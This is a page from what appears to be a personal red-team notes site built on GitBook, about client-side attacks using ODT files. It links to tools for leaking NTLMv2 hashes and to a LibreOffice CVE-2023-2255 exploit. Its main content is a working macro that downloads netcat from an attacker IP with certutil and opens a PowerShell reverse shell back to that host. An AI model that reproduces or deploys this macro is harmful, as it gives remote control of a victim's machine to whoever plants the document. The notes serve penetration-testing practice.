Red Team Operations
search
⌘Ctrlk
LinkedInGitHub
Red Team Operations
  • Red Teaming Lifecycle
  • Lab
  • Executing PowerShell
  • Domain Enumeration
    • PowerView
    • ActiveDirectory Module - OPSEC
    • User Hunting
    • GPOs & OUs
    • ACL
    • Trusts
    • BloodHound
  • Lateral Movement
    • PowerShell Remoting (WinRM)
    • Invoke-Mimikatz
    • File Transfers
    • Derivative Local Admin (Concept)
  • AV Evasion
    • PowerShell Scripts
    • Offensive .NET
    • Payload Delivery
  • Windows Privilege Escalation
    • Checklist
    • Initial Enumeration Manual
    • Initial Enumeration Automated
    • Service Permissions
    • Kernel Exploits
    • DLL Hijacking
    • Impersonation and Potato Attacks
    • Registy
    • whoami /priv
    • Scheduled tasks
    • xampp
    • Stored Passwords and Port Forwarding
    • RunAs
    • User Switching
    • Executable Files
    • Startup Applications
    • getsystem
    • Windows Subsystem for Linux
    • CVE-2019-1388
    • CVE-2024-26229 (new)
  • Enterprise Applications
    • Jenkins
  • Active Directory
    • Checklist
    • Initial Attack Strategy
    • Post-Compromise Enumeration
    • Lateral Movement
    • Post-Compromise Attacks
    • Post-Domain Compromise
    • Critical Active Directory CVE's
  • Post Exploitation
    • C2
    • AV Evasion
    • Exfiltration
    • Pivoting
    • File Transfers
    • DNS Tunneling
    • Persistence
    • PGP/ASC
    • Putty
    • Cleanup
  • Cool!
    • Client-side Attacks
      • Code execution via Windows Library
      • Evil Icon
      • ODT Files
    • Custom Wordlists
    • Fixing Exploits
    • Decrypting Secure Strings
    • tmux
    • Random
  • Report Writing
    • Findings Report
    • Common Legal Documents
gitbookPowered by GitBook
block-quoteOn this pagechevron-down
  1. Cool!chevron-right
  2. Client-side Attacks

ODT Files

Catch NTLMv2 hashes with badodt

LogoGitHub - rmdavy/badodf: Creates a malicious ODF document help leak NetNTLM CredsGitHubchevron-right

Catch a reverse shell instead

LogoInitial Access via Malicious ODT MacroMediumchevron-right
LogoGitHub - elweth-sec/CVE-2023-2255: CVE-2023-2255 Libre OfficeGitHubchevron-right
PreviousEvil Iconchevron-leftNextCustom Wordlistschevron-right
Sub Main
	shell("cmd /c certutil.exe -urlcache -f http://192.168.45.239/nc.exe C:\programdata\nc.exe")
	shell("C:\programdata\nc.exe 192.168.45.239 1337 -e powershell.exe")
End Sub